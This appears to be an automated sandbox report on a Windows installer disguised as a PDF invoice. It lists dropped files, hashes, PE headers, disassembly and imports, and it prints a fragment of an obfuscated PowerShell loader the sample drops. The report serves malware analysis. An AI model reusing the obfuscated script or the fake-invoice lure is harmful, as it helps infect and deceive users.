                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                        MD5:106D01F562D751E62B702803895E93E0
                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                        Malicious:false
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):914080
                        Entropy (8bit):7.025655869078184
                        Encrypted:false
                        SSDEEP:24576:JOreqxsYYU8rG98siSVrcQ8EO0fG5vq7He:JOCgLY69PRxfyq7+
                        MD5:3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE
                        SHA1:CE06AB538757EDB9B1D4CCE656006DA0D3795BB1
                        SHA-256:705D13694A98F8BBE7624D27646E60AF6586E1598FCCA6464414DED3AE43D1F5
                        SHA-512:97BBE6BA4C9CD15466CCE57A762B537DF55224329A354F119C7EA1AF9F554888BA7C477027C83DC62B39B9D74D4AC11FB97FA206EEA86C24A515A2F7A399A694
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 21%
                        • Antivirus: Virustotal, Detection: 14%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L...#.MX.................b....:......3............@...........................C...........@...........................................=.............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data.....9..........z..............@....ndata...@....:..........................rsrc........=.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:modified
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..
                        Process:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
                        Category:dropped
                        Size (bytes):15728640
                        Entropy (8bit):0.10103965264833503
                        Encrypted:false
                        SSDEEP:1536:GSB2jpSB2jFSjlK/4w/ZweshzbOlqVquesezbgl4KCIeszO/Zk3EufY:Ga6amUueqtDiu6b
                        MD5:05ED31CC5A8F6E5591DCBD13F044B588
                        SHA1:E224223FD7D82169BE2B50FA9C5AA514F6EBBC34
                        SHA-256:53CEC4FD5E5126208BA267073853ACD92BF70203157D20DCA7151B98882A914D
                        SHA-512:1F82B82F706EE8ECFA1860E1F81334FAE5D95951B8731A9DE01166DE3925F7363580C78774E405842054E359E8631A9BF1FAC2A8BF22E3F8DCE523D3A0008C5F
                        Malicious:false
                        Preview:.Y. ... ...................':...{........................N......4...{_..5...{..h.P.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{......................................5...{..................."...5...{C..........................#......h.P.....................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):322234
                        Entropy (8bit):7.672893796436556
                        Encrypted:false
                        SSDEEP:6144:/oleb5UaILagBZuB83AyX4LmOOBnAex4uejLdW8t3DqeyWrnzO:/ogbOe8QyX4qOOBrx4uel7tm3W7zO
                        MD5:7FF3D5BFD31D06F172660BC9457C8BDF
                        SHA1:9D84F647EAB98D98E4C9F77E3BC29CA213063AC7
                        SHA-256:A44B7BED6111AFA49D3955E6A7E267F090FBFC78FDB766CB882C41AF59AF8E99
                        SHA-512:2B9B4C5ABF7F6270903A0456DD596A7051BE854886951719DE7B625AAE0F30651685D2CB8E0FA78C8977BAE181E642FBF7381673F7701424FF7A19170ED806A2
                        Malicious:false
                        Preview:.............................Z.K...k.l....n.......33...zzz......ff............@..99.4.{.V.....]]........................1..............M............a............++...............5.............x........}..;.J...M.......................BB........._.}}}}....................}.........www.................................rr.........w...........wwwwww............................Z..................|._...........;.....^^.2........66..t............MMM........y...............V.....................(((......E........u....M......kkkkk...........8......X..zz...r.................g...!.aaa......[[[.>.................>..........$$......1111..z......a...]]]]]]].:.QQ........o....@................m...............................2...................{{{{.........................g.e.}}}.............<.......................}.4........>>>................d...t......&...Y............................ppp.........R...77.....aaaa................Z................ii....V............#.............,,,,..t........^^..ff..
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1380109
                        Entropy (8bit):0.2965766731960955
                        Encrypted:false
                        SSDEEP:768:z6vdVSQtNfCAR8D6/nO6kL9xaMs+tZ0n7iB+PfImH+CJF/9nvM0ECzP5RJvVOhx9:UlO
                        MD5:A44437EB03194D7232A624199B2DF6FB
                        SHA1:86CB2D6F010C0E68BDA58F24E385511B609EA8DC
                        SHA-256:FC305E7D2081AC8FD9BEA9DEFD115F7BDF5AE8E5E1237A366B07EA755280CFF3
                        SHA-512:0879342C1922B0EFC098E60ACADC586B5C2632402AF84B9BD9CFD250FC8B7BFE20480F0C85613A7134AC4113469A0216571383C033FB20552438FF33BBCFF137
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................#..................................................;............................................................................................................................................................................................................b.......y................................................................................................................$...1................................................................................................................................................................................................................q........................................................................................................................................h................
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):72765
                        Entropy (8bit):5.223817831555412
                        Encrypted:false
                        SSDEEP:1536:L5kFL9IYgA4LS+m/g27KFW0NRtkdkwqIzJD1R34BKP7MxABEBw3:9kFpIlA4LL6x750NQV9D1544PUA2u3
                        MD5:A722A8EE65CE2BF5D2FBD7450D8FE960
                        SHA1:2992F4B10C0E3D771862C5204B9B304EC2E50634
                        SHA-256:FEB62E067D0CD459BC5C93AC7DCB76062257D26D8FB47E9B9E9F9D94C6706AE3
                        SHA-512:0052EFD489BBA988C6147BFCC5ACB6FCCD81FF5A54F9B75C98DD69426C5D1A99513D89F17942D6606CB8786515FF3A35C7C862B7DB8F3A12B1ECBA63A9DF8DB9
                        Malicious:true
                        Preview:$Gnallingerne=$Mundsknk;<#ottaverim ungraphitized Torbanitic Bedriftssundhedstjenestens Lasty Ngleindustri Interglyph #><#Forrettighed roastbeefenes udtmningen #><#Brneomraadet Taxacheckenes Synsretningens Alem #><#Bohereen Undisclosing Multiperforate Glariness Vanryets datomrkendes Paintproof #><#Sulphophosphoric Greyware Trichinised Phenazine #><#Reauthorizes Conch Polishers #>$Tropesygdom = " ation;Homogen`$ Ka,ereRInviterm Mesac,eafstopwnEterniz=Udkramm`$ latituh RaidsdaScabwornReumatidCeratodeToothpil Hangars Forsk.m K nkreoOceanogn BotanioTeaterapArrangeoTaf.elelMegboteeO.iemalrTegns.kn Ov rste Skitses meiosiu aagribtUnfascitLew,hace Distrar Th,illmStraffeaParauntkHabiliteMeddelerLegitimrB.lerneo Unle,swRetapinb StatsseEmneomrascendintMindel iFremdatnD,uidrygAfda sn;Ha biolFGenfremu OmstemnTriveslcditri,htKeelbysiIntervaomisrecknJu eaue BrokbinSblodbancHnseavle Pu sernRe semoeKardinatPhotomieResteepkKbsprisn EternaiKlammenkPlankeveapogamyrStrangusDerithe Knubbed(coalise`$ romani
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):546961
                        Entropy (8bit):0.3003993023166451
                        Encrypted:false
                        SSDEEP:768:rAPoZNdc+xT+jN4VKQKkWyIN5/cJzad9FB1ev:oE
                        MD5:099CA0F2593851035CFC6F57AA233E64
                        SHA1:D487C62E5FA635C78AD7E415F471D00B1F4CC9FF
                        SHA-256:04DC6295D043275E66F8106244A202E3DAD8E3FBA62347DBE8CCC91B496570DF
                        SHA-512:F2AF47845762C9EF3EAE55819B315245917D69D424428E018A35BF289AB4D5EF8F06D5FD4368C1E93F51511ECD5B0C79336ED50F0CB1F5E4CB644EFE1B24AB21
                        Malicious:false
                        Preview:.................................................................w...................................................................................q........................................................................................................................................................^............................................................%...................................D...................F.................................................................*...................................................................................................................................................................................................................................................................................................................................................................[..............................................................................................................................................................
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):767051
                        Entropy (8bit):0.29627994613035125
                        Encrypted:false
                        SSDEEP:768:1uKKQWjZuz6wrOhDQ7XMNseKNuTNmgDawfwlAlEfOqpxj9mwyjP:oZUXU
                        MD5:C06E93EDE50AFE41BF3E112D1B5A11D3
                        SHA1:C589D45941BADD3FCDCFF09C4B9898B6641DCECB
                        SHA-256:E1D90119D6D38B3B041B46287A60970EE31CEE5341CB49C1115D2B54255FD221
                        SHA-512:80E29591F15DD8AADD6B9A6C3FC1DCF29C46ECFAEABDEF2006525498EDF7214B2F67A2BC9D8C52D00FF2361D37491FDA14757EEC6BBDAD82B2714C1A7E7CB310
                        Malicious:false
                        Preview:.....k........................................................................................................................................................................~........................................................................................................................................................................................M.........................................................................................................................................................................................................................t.......................X......s...............................................................................................H.......................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):493
                        Entropy (8bit):4.265610699322908
                        Encrypted:false
                        SSDEEP:12:mUNgTJemdi8Sv4a9zaqCA9y2UWoUte89B0LVbBOFyLEDgkL9:mdtdxSvx9za3rva1+hkL9
                        MD5:916EBCF44522B23FB0B3B2CAAD9A33DA
                        SHA1:3E38AD4F618591AE7B8E57D1DC081DB91A59629F
                        SHA-256:0BD2B81C28A6C12299C6B3635E00922A6ED9946C95560E91CFABB3D96BA47CE6
                        SHA-512:4DF8967D7BEEBDBC486F415A9C212DB820205312F472A8E9BC9561D81E61E694CA1A58AE6BF8C2490F89337E8C491F6C39A4B4D1EA4FF0813CDC2217596A35FA
                        Malicious:false
                        Preview:praedefinerede negeringsfunktionernes tredveaarsfdseldage skydemodstands finanskrisen irreparable..girandole uhviskhedernes synkefrdig donna,fundamental spartelmasses chymist spiserne semiplume..folkedomstole terraqueousness taknemligheds drtrin slievovitsers hustankenes..andresen fryseskab sknlitteraturerne bybefolkning ankylosing vgtafgiften dissimile.dermatopsy dialystely gonococcic lnmodtagerforholdets misgernings polos sydboernes suburban underbd bankoplysning oesophageal faconerne..
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):961935
                        Entropy (8bit):0.2969741295763117
                        Encrypted:false
                        SSDEEP:768:FxrLhS9LDE7a0bTIlOZXfjN7ksdqPYEdjKL+UH6q42m6yIrMnFTT0SE87ezGon1e:Gc0SV
                        MD5:4F229F17A06BFAA9637EBA9D45AA8ABA
                        SHA1:9AD4D65710F7814949CB2014919F6566E46BA954
                        SHA-256:1E4514350D46E16DE7B6D60BFD11FB32C5A8DAB39279534073064403D6DCB84B
                        SHA-512:9FEC0DFBB4284F1C9DFF577AF810CF6FD70ED9A4248BA0D78CF1C6552260D7CD1CC1E09F62EC269EE65769B25FE1E7C4B05801CB6C89205FB296727E2ED9A700
                        Malicious:false
                        Preview:..........................................................................................................................................................................................X............................................................................................................................................................................................I...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(............................................................
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):620315
                        Entropy (8bit):0.296622075661877
                        Encrypted:false
                        SSDEEP:768:aD0cT5XXq1EntSlVQuimnPf+J+iy+TqkJK1yXxUJpQB1r9inhG:2
                        MD5:17FD47BA873B2CF93E57E6D38B7B3D9E
                        SHA1:D723B7753FD8576A641CFF0AB2DC27E8D89BF2DA
                        SHA-256:8C2335B4493DDFC7C0D99AF3ED4F266B02CF338878CE9B63634BCC7513E721DD
                        SHA-512:1AC7C3438A9FB89FD0A5830DECEDAC0CA597B145DDAC9CC8187312304B5387B39EC66B4E072A62F907AA48A282D287073D21BCCD3DB0E735F745C571ABA25DD3
                        Malicious:false
                        Preview:............................................................................................................................................................................................................................-......................................................................................m............................................................................................................................................................................... ..............................................................................................................................................................................................................a.....................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                        Category:dropped
                        Size (bytes):976
                        Entropy (8bit):3.198285368205096
                        Encrypted:false
                        SSDEEP:12:8wl0OsXMlykXMX+qcDhd6NRAY5lWRNPkXg1Q1glAktr8+YNENH4t2YZ/elFlSJm:8Vr/+hMNflWDcKljHogdqy
                        MD5:827AEE104AC4395446A0DC5C08176FA3
                        SHA1:2E809DA48C886BAC4A89CFF2F40D2F07B23099A4
                        SHA-256:6EE74512801C1A4F08D122163A4F5ECA04A0A8EDC5C9846D85E13128D929E3E0
                        SHA-512:7B802A74E298840C6CDB94B5A3C58F9D5B3CDD516D9AB06F80FE1F5041AC73B3767D2E8AF6734E3202BD9C7BB8F3860489F9CE830EF67FB074AE7563C850E885
                        Malicious:false
                        Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....P.1...........Music.<............................................M.u.s.i.c.....\.1...........teoretisk.D............................................t.e.o.r.e.t.i.s.k.....z.2...........Connotational12.Cur.X............................................C.o.n.n.o.t.a.t.i.o.n.a.l.1.2...C.u.r...".......\.t.e.o.r.e.t.i.s.k.\.C.o.n.n.o.t.a.t.i.o.n.a.l.1.2...C.u.r.;.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.w.i.n.s.o.m.e.n.e.s.s.\.T.e.l.e.f.o.n.s.v.a.r.e.r.............)...........q..K.m.H..B" ..C)...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                        Process:C:\Windows\System32\svchost.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):55
                        Entropy (8bit):4.306461250274409
                        Encrypted:false
                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                        Malicious:false
                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.025655869078184
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        File size:914'080 bytes
                        MD5:3fb7cb8d7fd9efd2bc0cae35eb42c4fe
                        SHA1:ce06ab538757edb9b1d4cce656006da0d3795bb1
                        SHA256:705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
                        SHA512:97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694
                        SSDEEP:24576:JOreqxsYYU8rG98siSVrcQ8EO0fG5vq7He:JOCgLY69PRxfyq7+
                        TLSH:F415067E1BA7B997C0283731D86A2070135C2E49F7B82CEEB75A32B155746101EADD3E
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L...#.MX.................b....:......3............@
                        Icon Hash:556965335969650b
                        Entrypoint:0x403311
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x584DCA23 [Sun Dec 11 21:50:27 2016 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                        Signature Valid:false
                        Signature Issuer:E=Saluteringerne@Optraadte.Ov, O=Pranksome, OU="Usknsomme Underlivs Krvede ", CN=Pranksome, L=Villev\xeaque, S=Pays de la Loire, C=FR
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 26/11/2023 07:41:07 25/11/2026 07:41:07
                        Subject Chain
                        • E=Saluteringerne@Optraadte.Ov, O=Pranksome, OU="Usknsomme Underlivs Krvede ", CN=Pranksome, L=Villev\xeaque, S=Pays de la Loire, C=FR
                        Version:3
                        Thumbprint MD5:F792F4D1A122FDB7FF8F5A09BFB2E19E
                        Thumbprint SHA-1:1F1FFD38FBE833800239DB19D12AE41F365B2D18
                        Thumbprint SHA-256:B7E4B264BD7D06114B0EEF80A591540EDC1FAAC9BA5DF71C87756EC979C38811
                        Serial:21B68A67BAD26C09A54373A08FD4F431797E3D42
                        Instruction
                        sub esp, 000002D4h
                        push ebx
                        push esi
                        push edi
                        push 00000020h
                        pop edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [esp+14h], ebx
                        mov dword ptr [esp+10h], 0040A2E0h
                        mov dword ptr [esp+1Ch], ebx
                        call dword ptr [004080B0h]
                        call dword ptr [004080ACh]
                        cmp ax, 00000006h
                        je 00007F9C104EA823h
                        push ebx
                        call 00007F9C104ED964h
                        cmp eax, ebx
                        je 00007F9C104EA819h
                        push 00000C00h
                        call eax
                        mov esi, 004082B8h
                        push esi
                        call 00007F9C104ED8DEh
                        push esi
                        call dword ptr [0040815Ch]
                        lea esi, dword ptr [esi+eax+01h]
                        cmp byte ptr [esi], 00000000h
                        jne 00007F9C104EA7FCh
                        push ebp
                        push 00000009h
                        call 00007F9C104ED936h
                        push 00000007h
                        call 00007F9C104ED92Fh
                        mov dword ptr [007A8A24h], eax
                        call dword ptr [0040803Ch]
                        push ebx
                        call dword ptr [004082A4h]
                        mov dword ptr [007A8AD8h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 000002B4h
                        push eax
                        push ebx
                        push 0079FEE0h
                        call dword ptr [00408188h]
                        push 0040A2C8h
                        push 007A7A20h
                        call 00007F9C104ED518h
                        call dword ptr [004080A8h]
                        mov ebp, 007B3000h
                        push eax
                        push ebp
                        call 00007F9C104ED506h
                        push ebx
                        call dword ptr [00408174h]
                        add word ptr [eax], 0000h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3dd0000x5bad8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0xdda100x1890.data
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x61e80x62007105c7c7ca5a4b5bbc8bc8925d3c2002False0.6776945153061225data6.507727907374682IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x80000x13a40x14002fd23f25ba6d052f3a4f032544496f73False0.453125data5.162313935974215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa0000x39eb180x60096b0322a377adf87f6664c8d50305d4dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x3a90000x340000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x3dd0000x5bad80x5bc007d52bbf04bb54a3040d1850c6db645ffFalse0.07021936733651227data4.39755174962238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x3dd3280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.044334556321567006
                        RT_ICON0x41f3500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.08383118419496037
                        RT_ICON0x42fb780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.14478034955125177
                        RT_ICON0x433da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22520746887966805
                        RT_ICON0x4363480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.2607879924953096
                        RT_ICON0x4373f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3782786885245902
                        RT_ICON0x437d780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4698581560283688
                        RT_DIALOG0x4381e00x100dataEnglishUnited States0.5234375
                        RT_DIALOG0x4382e00x11cdataEnglishUnited States0.6056338028169014
                        RT_DIALOG0x4384000xc4dataEnglishUnited States0.5918367346938775
                        RT_DIALOG0x4384c80x60dataEnglishUnited States0.7291666666666666
                        RT_GROUP_ICON0x4385280x68dataEnglishUnited States0.7403846153846154
                        RT_VERSION0x4385900x204dataEnglishUnited States0.5445736434108527
                        RT_MANIFEST0x4387980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                        DLLImport
                        KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
